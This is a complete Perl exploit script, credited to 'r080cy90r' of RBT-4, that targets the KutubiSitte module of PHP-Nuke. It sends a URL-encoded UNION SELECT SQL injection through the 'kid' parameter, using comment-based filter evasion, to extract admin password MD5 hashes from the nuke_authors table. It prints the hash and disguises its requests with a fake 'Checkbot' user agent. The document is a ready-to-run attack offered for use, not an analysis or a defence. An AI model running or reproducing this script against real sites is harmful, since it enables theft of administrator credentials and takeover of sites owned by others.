#!/usr/bin/perl use Getopt::Std; use LWP::UserAgent; sub usg{ printf(" -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- | PHP-NUKE KutubiSitte [kid] => SQL Injection | -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#- ####################################################### # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 # ####################################################### <-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-> #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:# #:-------------------------------------------------------:# :#| USAGE: |#: :#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#: #:-------------------------------------------------------:# #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:# #:-------------------------------------------------------:# :#| EXAMPLE: |#: :#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#: #:-------------------------------------------------------:# #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:# "); } sub problem{ print "\n\n[~] SITO NON VULNERABILE [~]\n\n"; exit(); } sub exploitation{ $conn = LWP::UserAgent -> new; $conn->agent('Checkbot/0.4 '); $query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A"; $return_pwd = $conn->get($query_pwd) || problem(); $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem(); print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n "; } getopts(":h:p:U:",\%args); $host = $args{h} if (defined $args{h}); $path = $args{p} if (defined $args{p}); $user_id= $args{U}if (defined $args{U}); if (!defined $args{h} || !defined $args{p} || !defined $args{U}){ usg(); } else{ exploitation(); }